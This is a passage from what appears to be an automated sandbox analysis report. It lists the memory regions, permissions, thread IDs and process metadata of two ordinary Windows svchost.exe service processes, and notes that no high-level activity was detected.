| datastore.edb | 0xeaf6570000 | 0xeaf657ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf6590000 | 0xeaf6590000 | 0xeaf659ffff | Private Memory | rw |
|
|
|
- |
| datastore.edb | 0xeaf65a0000 | 0xeaf65affff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xeaf65b0000 | 0xeaf65bffff | Memory Mapped File | r |
|
|
|
- |
| datastore.edb | 0xeaf65c0000 | 0xeaf65cffff | Memory Mapped File | r |
|
|
|
- |
| msxml6r.dll | 0xeaf6610000 | 0xeaf6610fff | Memory Mapped File | r |
|
|
|
- |
| wuaueng.dll.mui | 0xeaf6620000 | 0xeaf6623fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000eaf6630000 | 0xeaf6630000 | 0xeaf667cfff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000eaf6680000 | 0xeaf6680000 | 0xeaf6687fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6690000 | 0xeaf6690000 | 0xeaf670ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6710000 | 0xeaf6710000 | 0xeaf675cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6770000 | 0xeaf6770000 | 0xeaf6776fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6780000 | 0xeaf6780000 | 0xeaf687ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6880000 | 0xeaf6880000 | 0xeaf68fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6900000 | 0xeaf6900000 | 0xeaf69fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6a00000 | 0xeaf6a00000 | 0xeaf6afffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6b00000 | 0xeaf6b00000 | 0xeaf6b7ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0xeaf6b80000 | 0xeaf6c5efff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000eaf6c60000 | 0xeaf6c60000 | 0xeaf6d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6d60000 | 0xeaf6d60000 | 0xeaf6ddffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6de0000 | 0xeaf6de0000 | 0xeaf6e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6e60000 | 0xeaf6e60000 | 0xeaf6f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf6f60000 | 0xeaf6f60000 | 0xeaf705ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7060000 | 0xeaf7060000 | 0xeaf715ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7160000 | 0xeaf7160000 | 0xeaf725ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7260000 | 0xeaf7260000 | 0xeaf735ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7360000 | 0xeaf7360000 | 0xeaf745ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7460000 | 0xeaf7460000 | 0xeaf755ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7560000 | 0xeaf7560000 | 0xeaf75dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf75e0000 | 0xeaf75e0000 | 0xeaf75e6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7600000 | 0xeaf7600000 | 0xeaf76fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7700000 | 0xeaf7700000 | 0xeaf77fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7800000 | 0xeaf7800000 | 0xeaf78fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7900000 | 0xeaf7900000 | 0xeaf79fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7a00000 | 0xeaf7a00000 | 0xeaf7afffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7b00000 | 0xeaf7b00000 | 0xeaf7bfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7c00000 | 0xeaf7c00000 | 0xeaf7cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7d00000 | 0xeaf7d00000 | 0xeaf7dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7e00000 | 0xeaf7e00000 | 0xeaf7efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7f00000 | 0xeaf7f00000 | 0xeaf7f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf7f80000 | 0xeaf7f80000 | 0xeaf807ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf8080000 | 0xeaf8080000 | 0xeaf817ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000eaf8190000 | 0xeaf8190000 | 0xeaf8196fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000eaf81a0000 | 0xeaf81a0000 | 0xeaf81affff | Pagefile Backed Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 358 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #67: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #67 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x338 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
304
0x
160
0x
34C
0x
CE0
0x
D2C
0x
78C
0x
8E0
0x
5F0
0x
4F0
0x
490
0x
37C
0x
148
0x
8
0x
298
0x
258
0x
254
0x
11C
0x
3E4
0x
3BC
0x
3B8
0x
3B4
0x
398
0x
394
0x
33C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000008b3b4c0000 | 0x8b3b4c0000 | 0x8b3b4cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x8b3b4d0000 | 0x8b3b4d0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000008b3b4e0000 | 0x8b3b4e0000 | 0x8b3b4f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008b3b500000 | 0x8b3b500000 | 0x8b3b57ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008b3b580000 | 0x8b3b580000 | 0x8b3b583fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008b3b590000 | 0x8b3b590000 | 0x8b3b590fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008b3b5a0000 | 0x8b3b5a0000 | 0x8b3b5a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x8b3b5b0000 | 0x8b3b66dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000008b3b670000 | 0x8b3b670000 | 0x8b3b670fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008b3b680000 | 0x8b3b680000 | 0x8b3b680fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3b6f0000 | 0x8b3b6f0000 | 0x8b3b6f6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3b700000 | 0x8b3b700000 | 0x8b3b7fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3b800000 | 0x8b3b800000 | 0x8b3b800fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3b810000 | 0x8b3b810000 | 0x8b3b810fff | Private Memory | rw |
|
|
|
- |
| wevtapi.dll | 0x8b3b820000 | 0x8b3b884fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008b3b890000 | 0x8b3b890000 | 0x8b3b896fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3b8a0000 | 0x8b3b8a0000 | 0x8b3b8bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3b8c0000 | 0x8b3b8c0000 | 0x8b3b8dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3b8e0000 | 0x8b3b8e0000 | 0x8b3b8fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3b900000 | 0x8b3b900000 | 0x8b3b9fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008b3ba00000 | 0x8b3ba00000 | 0x8b3bb87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008b3bb90000 | 0x8b3bb90000 | 0x8b3bd10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008b3bd20000 | 0x8b3bd20000 | 0x8b3bddffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008b3bde0000 | 0x8b3bde0000 | 0x8b3bedffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3bee0000 | 0x8b3bee0000 | 0x8b3bf5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3bf60000 | 0x8b3bf60000 | 0x8b3bfdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3bfe0000 | 0x8b3bfe0000 | 0x8b3c0dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c0e0000 | 0x8b3c0e0000 | 0x8b3c1dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008b3c1e0000 | 0x8b3c1e0000 | 0x8b3c1e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008b3c1f0000 | 0x8b3c1f0000 | 0x8b3c1f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008b3c200000 | 0x8b3c200000 | 0x8b3c200fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c210000 | 0x8b3c210000 | 0x8b3c216fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c220000 | 0x8b3c220000 | 0x8b3c29ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c2a0000 | 0x8b3c2a0000 | 0x8b3c2a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008b3c2b0000 | 0x8b3c2b0000 | 0x8b3c2b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pcaevts.dll | 0x8b3c2c0000 | 0x8b3c2c4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008b3c300000 | 0x8b3c300000 | 0x8b3c3fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c400000 | 0x8b3c400000 | 0x8b3c47ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c480000 | 0x8b3c480000 | 0x8b3c4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c500000 | 0x8b3c500000 | 0x8b3c57ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c580000 | 0x8b3c580000 | 0x8b3c5fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c600000 | 0x8b3c600000 | 0x8b3c6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c700000 | 0x8b3c700000 | 0x8b3c7fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c800000 | 0x8b3c800000 | 0x8b3c8fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3c900000 | 0x8b3c900000 | 0x8b3c9fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x8b3ca00000 | 0x8b3cd36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008b3cd40000 | 0x8b3cd40000 | 0x8b3ce3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3ce40000 | 0x8b3ce40000 | 0x8b3cebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3cf00000 | 0x8b3cf00000 | 0x8b3cffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3d000000 | 0x8b3d000000 | 0x8b3d0fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3d100000 | 0x8b3d100000 | 0x8b3d1fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3d200000 | 0x8b3d200000 | 0x8b3d2fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3d300000 | 0x8b3d300000 | 0x8b3d3fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3d400000 | 0x8b3d400000 | 0x8b3d4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3d500000 | 0x8b3d500000 | 0x8b3d5fffff | Private Memory | rw |
|
|
|
- |
| winlogon.exe | 0x8b3d600000 | 0x8b3d692fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008b3d700000 | 0x8b3d700000 | 0x8b3d7fffff | Private Memory | rw |
|
|
|
- |
| services.exe | 0x8b3d800000 | 0x8b3d86ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008b3d870000 | 0x8b3d870000 | 0x8b3d8effff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3d900000 | 0x8b3d900000 | 0x8b3d9fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3da00000 | 0x8b3da00000 | 0x8b3dafffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3db00000 | 0x8b3db00000 | 0x8b3dbfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3dd00000 | 0x8b3dd00000 | 0x8b3ddfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3de00000 | 0x8b3de00000 | 0x8b3defffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3df00000 | 0x8b3df00000 | 0x8b3dffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3e000000 | 0x8b3e000000 | 0x8b3e0fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3e100000 | 0x8b3e100000 | 0x8b3e1fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3e200000 | 0x8b3e200000 | 0x8b3e2fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3e300000 | 0x8b3e300000 | 0x8b3e3fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3e400000 | 0x8b3e400000 | 0x8b3e4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008b3e500000 | 0x8b3e500000 | 0x8b3e5fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff480000 | 0x7df5ff480000 | 0x7ff5ff47ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff67348a000 | 0x7ff67348a000 | 0x7ff67348bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67348c000 | 0x7ff67348c000 | 0x7ff67348dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67348e000 | 0x7ff67348e000 | 0x7ff67348ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673490000 | 0x7ff673490000 | 0x7ff673491fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673494000 | 0x7ff673494000 | 0x7ff673495fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673496000 | 0x7ff673496000 | 0x7ff673497fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673498000 | 0x7ff673498000 | 0x7ff673499fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67349a000 | 0x7ff67349a000 | 0x7ff67349bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67349c000 | 0x7ff67349c000 | 0x7ff67349dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67349e000 | 0x7ff67349e000 | 0x7ff67349ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6734a0000 | 0x7ff6734a0000 | 0x7ff6734a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6734a2000 | 0x7ff6734a2000 | 0x7ff6734a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6734a4000 | 0x7ff6734a4000 | 0x7ff6734a5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6734a6000 | 0x7ff6734a6000 | 0x7ff6734a7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6734a8000 | 0x7ff6734a8000 | 0x7ff6734a9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6734aa000 | 0x7ff6734aa000 | 0x7ff6734abfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6734ac000 | 0x7ff6734ac000 | 0x7ff6734adfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6734ae000 | 0x7ff6734ae000 | 0x7ff6734affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6734b0000 | 0x7ff6734b0000 | 0x7ff6735affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6735b0000 | 0x7ff6735b0000 | 0x7ff6735d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6735d3000 | 0x7ff6735d3000 | 0x7ff6735d4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6735d5000 | 0x7ff6735d5000 | 0x7ff6735d6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6735d7000 | 0x7ff6735d7000 | 0x7ff6735d7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6735d8000 | 0x7ff6735d8000 | 0x7ff6735d9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6735da000 | 0x7ff6735da000 | 0x7ff6735dbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6735dc000 | 0x7ff6735dc000 | 0x7ff6735ddfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6735de000 | 0x7ff6735de000 | 0x7ff6735dffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| dbghelp.dll | 0x7ff8d5060000 | 0x7ff8d51e9fff | Memory Mapped File | rwx |
|
|
|
- |
| wscsvc.dll | 0x7ff8d51f0000 | 0x7ff8d521ffff | Memory Mapped File | rwx |
|
|
|
- |
| audioses.dll | 0x7ff8d98e0000 | 0x7ff8d9964fff | Memory Mapped File | rwx |
|
|
|
- |
| deviceaccess.dll | 0x7ff8db3c0000 | 0x7ff8db402fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7ff8e0290000 | 0x7ff8e02a3fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7ff8e02b0000 | 0x7ff8e03a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7ff8e06b0000 | 0x7ff8e06c0fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7ff8e56f0000 | 0x7ff8e576efff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ff8e5dd0000 | 0x7ff8e5ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcore6.dll | 0x7ff8e7220000 | 0x7ff8e7267fff | Memory Mapped File | rwx |
|
|
|
- |
| cmintegrator.dll | 0x7ff8e7270000 | 0x7ff8e727dfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ff8e7280000 | 0x7ff8e7299fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ff8e72a0000 | 0x7ff8e72b5fff | Memory Mapped File | rwx |
|
|
|
- |
| wcmcsp.dll | 0x7ff8e72c0000 | 0x7ff8e72f5fff | Memory Mapped File | rwx |
|
|
|
- |
| wcmsvc.dll | 0x7ff8e7300000 | 0x7ff8e7397fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcore.dll | 0x7ff8e73a0000 | 0x7ff8e73fcfff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ff8e7430000 | 0x7ff8e7560fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ff8e75b0000 | 0x7ff8e75bafff | Memory Mapped File | rwx |
|
|
|
- |
| ksuser.dll | 0x7ff8e75c0000 | 0x7ff8e75c7fff | Memory Mapped File | rwx |
|
|
|
- |
| audiosrv.dll | 0x7ff8e75d0000 | 0x7ff8e76e0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ff8e7b40000 | 0x7ff8e7bb1fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiclnt.dll | 0x7ff8e7d90000 | 0x7ff8e7da0fff | Memory Mapped File | rwx |
|
|
|
- |
| wevtsvc.dll | 0x7ff8e82b0000 | 0x7ff8e845afff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ff8e8460000 | 0x7ff8e846afff | Memory Mapped File | rwx |
|
|
|
- |
| nrpsrv.dll | 0x7ff8e8470000 | 0x7ff8e8478fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ff8e8480000 | 0x7ff8e84b7fff | Memory Mapped File | rwx |
|
|
|
- |
| lmhsvc.dll | 0x7ff8e84c0000 | 0x7ff8e84c9fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ff8e84e0000 | 0x7ff8e84f7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ff8e8ad0000 | 0x7ff8e8ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ff8e9ae0000 | 0x7ff8e9b11fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ff8e9b20000 | 0x7ff8e9ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ff8e9cd0000 | 0x7ff8e9cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| hid.dll | 0x7ff8e9e00000 | 0x7ff8e9e0bfff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ff8ea000000 | 0x7ff8ea00bfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ff8ea3c0000 | 0x7ff8ea467fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ff8ea5c0000 | 0x7ff8ea61cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ff8ea820000 | 0x7ff8ea877fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 20 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #68: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #68 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x360 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
984
0x
954
0x
924
0x
914
0x
8CC
0x
8BC
0x
890
0x
3B0
0x
3AC
0x
364
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000000cb8990000 | 0xcb8990000 | 0xcb899ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xcb89a0000 | 0xcb89a0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000cb89b0000 | 0xcb89b0000 | 0xcb89c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000cb89d0000 | 0xcb89d0000 | 0xcb8a4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000cb8a50000 | 0xcb8a50000 | 0xcb8a53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000cb8a60000 | 0xcb8a60000 | 0xcb8a60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000cb8a70000 | 0xcb8a70000 | 0xcb8a71fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xcb8a80000 | 0xcb8b3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000cb8b40000 | 0xcb8b40000 | 0xcb8b40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb8b50000 | 0xcb8b50000 | 0xcb8b50fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000cb8b60000 | 0xcb8b60000 | 0xcb8b60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000cb8b70000 | 0xcb8b70000 | 0xcb8b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000cb8ba0000 | 0xcb8ba0000 | 0xcb8ba6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb8c00000 | 0xcb8c00000 | 0xcb8cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000cb8d80000 | 0xcb8d80000 | 0xcb8e3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000cb8e70000 | 0xcb8e70000 | 0xcb8e76fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb8e80000 | 0xcb8e80000 | 0xcb8efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb8f00000 | 0xcb8f00000 | 0xcb8ffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000cb9000000 | 0xcb9000000 | 0xcb9187fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000cb9190000 | 0xcb9190000 | 0xcb9310fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000cb9320000 | 0xcb9320000 | 0xcb941ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb9420000 | 0xcb9420000 | 0xcb951ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb9520000 | 0xcb9520000 | 0xcb961ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xcb9620000 | 0xcb9956fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000cb9960000 | 0xcb9960000 | 0xcb9a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb9a60000 | 0xcb9a60000 | 0xcb9b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb9c60000 | 0xcb9c60000 | 0xcb9d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb9d60000 | 0xcb9d60000 | 0xcb9e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000cb9e60000 | 0xcb9e60000 | 0xcb9f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffaa0000 | 0x7df5ffaa0000 | 0x7ff5ffa9ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff673964000 | 0x7ff673964000 | 0x7ff673965fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673966000 | 0x7ff673966000 | 0x7ff673967fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673968000 | 0x7ff673968000 | 0x7ff673969fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67396c000 | 0x7ff67396c000 | 0x7ff67396dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67396e000 | 0x7ff67396e000 | 0x7ff67396ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff673970000 | 0x7ff673970000 | 0x7ff673a6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff673a70000 | 0x7ff673a70000 | 0x7ff673a92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff673a93000 | 0x7ff673a93000 | 0x7ff673a94fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673a95000 | 0x7ff673a95000 | 0x7ff673a95fff | Private Memory | rw |
